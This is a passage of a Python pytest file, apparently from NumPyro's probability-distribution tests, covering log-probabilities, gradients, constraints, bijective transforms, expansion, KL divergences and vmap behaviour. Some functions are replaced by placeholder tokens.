pytest.skip(\n 'skip testing cdf/icdf methods of multivariate distributions')\n samples = d.sample(key=random.PRNGKey(0), sample_shape=(100,))\n quantiles = random.uniform(random.PRNGKey(1), (100,) + d.shape())\n try:\n rtol = 0.002 if jax_dist in (dist.Gamma, dist.StudentT) else 1e-05\n if d.shape() == () and not d.is_discrete:\n assert_allclose(jax.vmap(jax.grad(d.cdf))(samples), jnp.exp(d.\n log_prob(samples)), atol=1e-05, rtol=rtol)\n assert_allclose(jax.vmap(jax.grad(d.icdf))(quantiles), jnp.exp(\n -d.log_prob(d.icdf(quantiles))), atol=1e-05, rtol=rtol)\n assert_allclose(d.cdf(d.icdf(quantiles)), quantiles, atol=1e-05,\n rtol=1e-05)\n assert_allclose(d.icdf(d.cdf(samples)), samples, atol=1e-05, rtol=rtol)\n except NotImplementedError:\n pass\n if not sp_dist:\n pytest.skip('no corresponding scipy distn.')\n sp_dist = sp_dist(*params)\n try:\n actual_cdf = d.cdf(samples)\n expected_cdf = sp_dist.cdf(samples)\n assert_allclose(actual_cdf, expected_cdf, atol=1e-05, rtol=1e-05)\n actual_icdf = d.icdf(quantiles)\n expected_icdf = sp_dist.ppf(quantiles)\n assert_allclose(actual_icdf, expected_icdf, atol=0.0001, rtol=0.0001)\n except NotImplementedError:\n pass\n\n\n<mask token>\n\n\[email protected]('dimension', [2, 3, 5])\[email protected]('concentration', [0.6, 2.2])\ndef test_log_prob_LKJCholesky(dimension, concentration):\n d = dist.LKJCholesky(dimension, concentration, sample_method='cvine')\n beta_sample = d._beta.sample(random.PRNGKey(0))\n beta_log_prob = jnp.sum(d._beta.log_prob(beta_sample))\n partial_correlation = 2 * beta_sample - 1\n affine_logdet = beta_sample.shape[-1] * jnp.log(2)\n sample = signed_stick_breaking_tril(partial_correlation)\n inv_tanh = lambda t: jnp.log((1 + t) / (1 - t)) / 2\n inv_tanh_logdet = jnp.sum(jnp.log(vmap(grad(inv_tanh))(\n partial_correlation)))\n unconstrained = inv_tanh(partial_correlation)\n corr_cholesky_logdet = biject_to(constraints.corr_cholesky\n ).log_abs_det_jacobian(unconstrained, sample)\n signed_stick_breaking_logdet = corr_cholesky_logdet + inv_tanh_logdet\n actual_log_prob = d.log_prob(sample)\n expected_log_prob = (beta_log_prob - affine_logdet -\n signed_stick_breaking_logdet)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-05)\n assert_allclose(jax.jit(d.log_prob)(sample), d.log_prob(sample), atol=2e-06\n )\n\n\ndef test_zero_inflated_logits_probs_agree():\n concentration = np.exp(np.random.normal(1))\n rate = np.exp(np.random.normal(1))\n d = dist.GammaPoisson(concentration, rate)\n gate_logits = np.random.normal(0)\n gate_probs = expit(gate_logits)\n zi_logits = dist.ZeroInflatedDistribution(d, gate_logits=gate_logits)\n zi_probs = dist.ZeroInflatedDistribution(d, gate=gate_probs)\n sample = np.random.randint(0, 20, (1000, 100))\n assert_allclose(zi_probs.log_prob(sample), zi_logits.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_beta_binomial_log_prob(total_count, shape):\n concentration0 = np.exp(np.random.normal(size=shape))\n concentration1 = np.exp(np.random.normal(size=shape))\n value = jnp.arange(1 + total_count)\n num_samples = 100000\n probs = np.random.beta(concentration1, concentration0, size=(\n num_samples,) + shape)\n log_probs = dist.Binomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.BetaBinomial(concentration1, concentration0, total_count\n ).log_prob(value)\n assert_allclose(actual, expected, rtol=0.02)\n\n\[email protected]('total_count', [1, 2, 3, 10])\[email protected]('batch_shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_dirichlet_multinomial_log_prob(total_count, batch_shape):\n event_shape = 3,\n concentration = np.exp(np.random.normal(size=batch_shape + event_shape))\n value = total_count * jnp.eye(event_shape[-1]).reshape(event_shape + (1\n ,) * len(batch_shape) + event_shape)\n num_samples = 100000\n probs = dist.Dirichlet(concentration).sample(random.PRNGKey(0), (\n num_samples, 1))\n log_probs = dist.Multinomial(total_count, probs).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.DirichletMultinomial(concentration, total_count).log_prob(\n value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(1,), (3, 1), (2, 3, 1)])\ndef test_gamma_poisson_log_prob(shape):\n gamma_conc = np.exp(np.random.normal(size=shape))\n gamma_rate = np.exp(np.random.normal(size=shape))\n value = jnp.arange(15)\n num_samples = 300000\n poisson_rate = np.random.gamma(gamma_conc, 1 / gamma_rate, size=(\n num_samples,) + shape)\n log_probs = dist.Poisson(poisson_rate).log_prob(value)\n expected = logsumexp(log_probs, 0) - jnp.log(num_samples)\n actual = dist.GammaPoisson(gamma_conc, gamma_rate).log_prob(value)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_log_prob_gradient(jax_dist, sp_dist, params):\n if jax_dist in [dist.LKJ, dist.LKJCholesky]:\n pytest.skip('we have separated tests for LKJCholesky distribution')\n if jax_dist is _ImproperWrapper:\n pytest.skip(\n 'no param for ImproperUniform to test for log_prob gradient')\n rng_key = random.PRNGKey(0)\n value = jax_dist(*params).sample(rng_key)\n\n def fn(*args):\n return jnp.sum(jax_dist(*args).log_prob(value))\n eps = 0.001\n for i in range(len(params)):\n if jax_dist is dist.EulerMaruyama and i == 1:\n continue\n if jax_dist is _SparseCAR and i == 3:\n continue\n if isinstance(params[i], dist.Distribution):\n continue\n if params[i] is None or jnp.result_type(params[i]) in (jnp.int32,\n jnp.int64):\n continue\n actual_grad = jax.grad(fn, i)(*params)\n args_lhs = [(p if j != i else p - eps) for j, p in enumerate(params)]\n args_rhs = [(p if j != i else p + eps) for j, p in enumerate(params)]\n fn_lhs = fn(*args_lhs)\n fn_rhs = fn(*args_rhs)\n expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)\n assert jnp.shape(actual_grad) == jnp.shape(params[i])\n if i == 0 and jax_dist is dist.Delta:\n expected_grad = 0.0\n assert_allclose(jnp.sum(actual_grad), expected_grad, rtol=0.01,\n atol=0.01)\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\n<mask token>\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\n<mask token>\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\n<mask token>\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\n<mask token>\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\n<mask token>\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\n<mask token>\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
